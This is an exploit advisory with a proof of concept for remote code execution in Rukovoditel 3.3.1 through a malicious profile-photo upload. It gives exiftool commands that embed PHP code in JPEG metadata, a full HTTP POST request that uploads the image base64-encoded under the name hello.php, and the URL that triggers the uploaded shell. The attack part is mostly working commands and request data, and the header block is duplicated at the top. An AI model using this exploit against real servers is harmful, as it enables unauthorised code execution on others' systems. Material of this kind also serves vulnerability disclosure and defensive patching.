Exploit Title: Rukovoditel 3.3.1 - Remote Code Execution (RCE)
Version: 3.3.1
Bugs: rce via jpeg file upload
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Exploit Title: Rukovoditel 3.3.1 - Remote Code Execution (RCE)
Version: 3.3.1
Bugs: rce via jpeg file upload
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date of found: 12-03-2023
Author: Mirabbas AÄŸalarov
Tested on: Linux


2. Technical Details & POC
========================================
#First of all, we need to inject the php codes into the metadata of any jpeg file with exiftool. (for example)

exiftool -overwrite_original -comment="<?php system('id'); ?>" index.jpeg
exiftool -overwrite_original -DocumentName="<?php phpinfo(); ?>" index.jpeg

#after that we need to get the base64 code of the image (i used this site)
https://h3yy0.csb.app/



#and we have to do url encoding


#now we have to upload profile photo

Poc request (I changed the file name to hello.php and and pasted our base 64 code)



POST /index.php?module=users/photo&action=save&token=34GtgxfEmO HTTP/1.1
Host: localhost
Content-Length: 9567
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/index.php?module=users/account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cookie_test=please_accept_for_session; sid=0d3esjp74uo3q3gp38r044vc9h; sidebar_closed=1
Connection: close

img=data%3Aimage%2Fjpeg%3Bbase64%2C%2F9j%2F4AAQSkZJRgABAQAAAQABAAD%2F4QB4RXhpZgAATU0AKgAAAAgABQENAAIAAAAWAAAASgEaAAUAAAABAAAAYAEbAAUAAAABAAAAaAEoAAMAAAABAAEAAAITAAMAAAABAAEAAAAAAAA8P3BocCBlY2hvICdzYWxhbScgPz4AAAAAAQAAAAEAAAABAAAAAf%2F%2BABU8P3BocCBwaHBpbmZvKCk7ID8%2B%2F9sAhAAJBgcSEhIVExMTFRUVFRYXFxUVFhUVFhgWFhUVFhYVFRUVGB0oIBgaJR0VFSExISUpKy4uLhcfMzgzLTcoLS4rAQoKCg4NDhoQEBstJR8lLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS3%2FwAARCAEqAKkDASIAAhEBAxEB%2F8QAGwAAAgMBAQEAAAAAAAAAAAAABAUCAwYBBwD%2FxAA8EAABAwIEAwYFAgUDBAMAAAABAAIRAyEEEjFBBVFhBiJxgZGhE7HB0fAy4RQjQlJiB3LxFVOCkhYz0v%2FEABkBAAMBAQEAAAAAAAAAAAAAAAECAwQABf%2FEACMRAAICAwEBAAICAwAAAAAAAAABAhEDITESQSJRE3EEMmH%2F2gAMAwEAAhEDEQA%2FAMhSCvYFVSaiWNWA2k2IqmFQxqJphBjIuYFcxqqar6YU2URYwK0NX1MKxKxkVOCFrBGuCFroBFWJSPHp5iSkePKrAnPhn8UhgisUhVsjwxS6fFRcplQcmQpWVxi6V1iYAVRCMphC0AjaYUpDom0KUL4BSShHdFFMQlNXscos0BLArmIdhV7CgFBNMIqmxDUkXSSMoi5rVbCraFNIxkQqIDEFGVXJfiCgEW4pyRY5yc4spFjSq4yWQT4hDq%2BsqFsXDEzpUCplQKZAKypUwolTpJgBtAIxgQtAIxgUWOiYCkvgF2EoRswq1qrYrmBSNBbTKJpqhgRNMJWFF9IIukEPSCJppGUQS0LjwuNXXJRkDVSgayPqIGuuCKsWkWNT7FpFjVXGRyCeqqSr6qoK2Ixs%2BUSpKLkUAqKtpBVlXUQiwINoBGMCGoBFtCkyiJBdhdC%2BSnDemiGBDsRFNRNBewIhiopq9oQYyCKaKpCUJTCYUWhoBO%2Bg%2BvgkodFnwiBOyi5dGOI0Fuu%2BiJyNfZtn8v6b6X2XOP6G2uiyqga6YVxFjql2IKUIrxZSPGJ1i3JJiyrYyOQVVkO5E1UO5a0Y2cUSpqLkUAqKIohUImgEWBB1AItoQ1AIpoUWURJfKQC%2BylA4bU1cxUMKuYVE0BNNEU0KwoikUGMg2gyfAXPgrcRVJv8AkbBcayAG8wHO8%2F0j6%2BaBxmLuYS1bovDSsJa46%2Fn5ZMcI0Nk7xcCJ8JSDDYq48dFsMNTytBy5Z1dmHzta0W5rTHHojPJQDjaeemH6uaBmkQSJgEjnokGIC1mJGQjdryQZtqI5m%2F5ssxj6Ra4tOxj91myKpDxdoR4wJLignWLSbEp8ZLILKqHciqg1Qz1qRkZEKJXVwpgEAiqAQ7GE7J5wjg1SpBIyt5nfwG6EmGKb4Qw7Z0Wt4B2PrVyC4FjT%2FwC0fRabsh2PY0B7h4E6nr0W6%2BG1ggAKDlfC6xpdMxg%2ByOHo3LQTzN%2Fmiv4DD%2F2N9ArOLYsCBE5vy6F%2BC78Kk3bNChS3o80arWKDArmBMSLWImkEOwImiLhKEN4jVyueOsDwFh8knxZBumPG3RUd4yPO%2FwBVnMXioF0yjtmi7ii2li8jpWx4Bxb4gykw7WMhqA%2FXSNF50yuC4X3%2FACStnwfE0gA2mXPdF%2FhkwP8AyJv42C1QRmymmxp7plvgQ076TMTe6Q46iajQ4fqbZw6bHy09ETVxThIdL7Gx29CSleHxZD80WM5m8wbO9ZlZ8sdjYnoDrcIqOmIS%2FF9na2wB81r3jK8NFxFp3B0KhVfJndGMa4JJ30wFbs%2FXE9wqqh2crvdlyGSJE9F6EcWGgjddxGJjK5pgxrsqJknBGOZ2HqhhLjDpAA%2BcrlLsqxpPxX2GwTrGceeJB1Wfo4t9V8CSSYHqklNlIYl9HGHFMRTpUxOgMSfFbfs72ciKlW51A%2B6H7K9nxT77oc%2F5dAtc2dlFS9F2lHgSx0aQqsc4ZC7yI%2FPy6Ar1BeLHzS%2BrxJ4BaTM9U%2F8AIoqmCOFt2gPG4oMFWsb%2FAAmy3q42bPnHovPf%2Bt4n%2FuuWi7b4rJTpUQYL%2FwCZU8JhgPuVjYRxxpEf8ifqf9DVhVzSh2K1pShCWFGYJsuA5lAsRuHOVwifwLvoxXTpZy8uJysFiTvoB8lj%2BMVxnMGwWp4szLRYN3Brj5idPArHYtsPE3Gn2VYr4P6%2Bjbs%2FwxtbvPIa3rv4D6rWMxNGk0MpjSLC2m7haVluH4ZzZOWzhEGQJEEB0XjWyfMqOs0tjLAd3ctzoZ0ynQEclZaM0nbLzWLgY535np4IOuCDOm33Tvh2EDiJ7rh%2Btuo6OHQ3XOJcPgdPlp9VLJwbHLZRWr5zTI5RPgNlB7h8R7TItIPKRKpwlKInY36QHTPomGMDXUnP2gt87%2FQhSjKiskAurTGYXiD%2BeqXY6o6iCDdp9p0PoQp06hhoPJve%2BR%2Bc9Aqs09xxmC5hB%2Ftgwm9C0KsnxJMnaPBc7JvLcSwRuZ80x4ZhmuDmaFs%2BcbfNNMHwkBwezUjRSnLVFILZvsA0QIPzRxa78ulfB2d2%2FJGGoWAmDHqhi4Ge2DcQxDmiImdOfql%2FD8Nmcc2ky48gLm6YDHseQMw1u0iEk%2F1AxJosLKboDyAYtaJKMoqT%2FwCD%2B3jg9bMNx7HGtXqP2LiG9GizQPJLoUiFyFc84ZtVjVUCptUzQE0dUZkJe07BB4YSUfmRSs6xZ2jxUv8AID2Snh%2BDNV8TA8BcHWAdUXxDCPqP%2Bf7lMcDhPhiD5J72df40MMLhW5cpAkWI52gEctijsPYlp7wI7s8jEtPT88A6T9Drt7osFG7J0X0AAQRb80K5iq8gjxHqNl83QIV93X5%2BxsfeChJ6pjRX0WYqq5shsmYA6g5QYHt6q11eKFSmYBDh7getw72VtOO5a9p6ET%2F%2BVXWw4NzoSHR07zr%2BsJFEpYFw2kXYeSNHFt%2BQdb3EeapxlGHtcLjfmRpJ8reStocRyVfhx3bevdd6zKKxjJLdg5pHnAc0%2B8IPQVsAxWHdSxIqCcj4vyJABB8fqthgoLmiJEfMD7FLa9djKbA%2B%2BYWnmIP2THAPhwgzYX6H%2Fg%2BqlPY8TS4BgIBj82RteiHiNuiowzIty%2B10a1yC0hW9ifFcMZT73t91lP8AU%2BoIoN%2FqcC4%2BwC2%2BIMvaOsn7LzDt%2FXc%2FFunQABvQDknx9FytuOzNLikuK5lGIVjQoBWNKmaA7h9GTPJEuYQvsGMrR1XcQ9E4pdIQ76hJ%2FPmu1H9ZVbKU8vzkdkAltOqR9fumuCOa2qW0KAP0kX9d05wbYCZAZe0QIQVZ0GdPzRFvJOirfh51XM5I%2BwNBrjprBBG17%2FMoTizfhSIs6b9M7XT7lEYQPpOtBHK3nBV%2Fal7X0Wm1nRP%2B5swfzZcn%2BJzX5IUcR4WKlJ1Zgu2XjqWy75W9EMaxNKm8%2FwBAg9CCNfULQ9kW56UO3%2BRMGfRKuM4AsFfZs%2FEbyyklnyLUJbVhi90U8c71TDU9QWyPIAfJo9Vp8LhhTLfAfQfRZPgwdUrYcn%2BhnvafcStpxxuSmx4mxA8Z%2FwCR6JWtDXuh1h%2F0g87%2FAGRLXSEPg%2B%2FRkakeiswtPKLlJKL%2BHJkKreaw3%2BouAPcqgCNCd1vHtk6FKu1WCz4WoInKJHklhakdPcTx5fLpXFqMg8%2FhlKnRuE2NBVmnCUqiis8NCHrVSfz2Usc09UtfiHN6hcOE1JOinh

#we visit the image

http://localhost/uploads/users/tmp/hello.php